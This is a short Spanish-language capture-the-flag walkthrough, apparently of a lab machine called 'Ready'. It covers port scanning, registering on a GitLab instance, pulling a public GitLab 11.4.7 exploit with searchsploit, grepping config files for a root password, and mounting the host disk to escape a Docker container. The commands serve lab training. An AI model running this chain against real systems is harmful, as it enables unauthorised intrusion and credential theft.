nmap -A -p- -oA output ## 10.129.205.129 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210830134105.png

nmap -sC -sV -O -p- -oA ready 10.129.205.129

nmap -sU -O -p- -oA ready-udp 10.129.205.129

nikto -h 10.129.205.129:80

Pasted image 20210830134319.png

Vemos el puerto 22 y 5080 estan abiertos.

Nos vamos a la pagina http://10.129.205.129:5080 y nos registramos

Pasted image 20210830134505.png

whatweb http://10.129.205.129:5080

Pasted image 20210830134759.png

Nos registramos como un usuario nuevo

Pasted image 20210830135403.png

Vamos a ajustes y despues Access Tokens. Habilitamos el checkbox de api.

Pasted image 20210830135546.png

Vemos el nuevo Access Token.

Pasted image 20210830135715.png

curl -s -X GET http://10.129.205.129:5080/api/v4/version" -H "PRIVATE-TOKEN: NuLqEr5GZ1-WL65sALq2" | jq

Pasted image 20210830140018.png

searchsploit gitlab 11.4.7

Pasted image 20210830140048.png

searchsploit -m 49257.py

Pasted image 20210830140756.png

Cambiamos los atributos adecuados para que funcione el script

python3 49257.py

Pasted image 20210830141205.png

cd dude

Pasted image 20210830141516.png

sudo -l

find \-perm -4000 2>/dev/null

Pasted image 20210830141730.png

cd opt

grep "sh$" /etc/passwd

Pasted image 20210830142048.png

cat docker-compose.yml

Pasted image 20210830142310.png

cat gitlab.rb | grep "pass"

Pasted image 20210830142435.png

su root

Introducimos la contrasena encontrada en la imagen anterior

Pasted image 20210830142942.png

fdisk -l

Pasted image 20210830143529.png

mkdir /mnt/mounted

mount /dev/sda2 mnt/mounted/

cd /mnt/mounted

Pasted image 20210830144017.png

boxes

copyright©2022 Cu3rv0x all rights reserved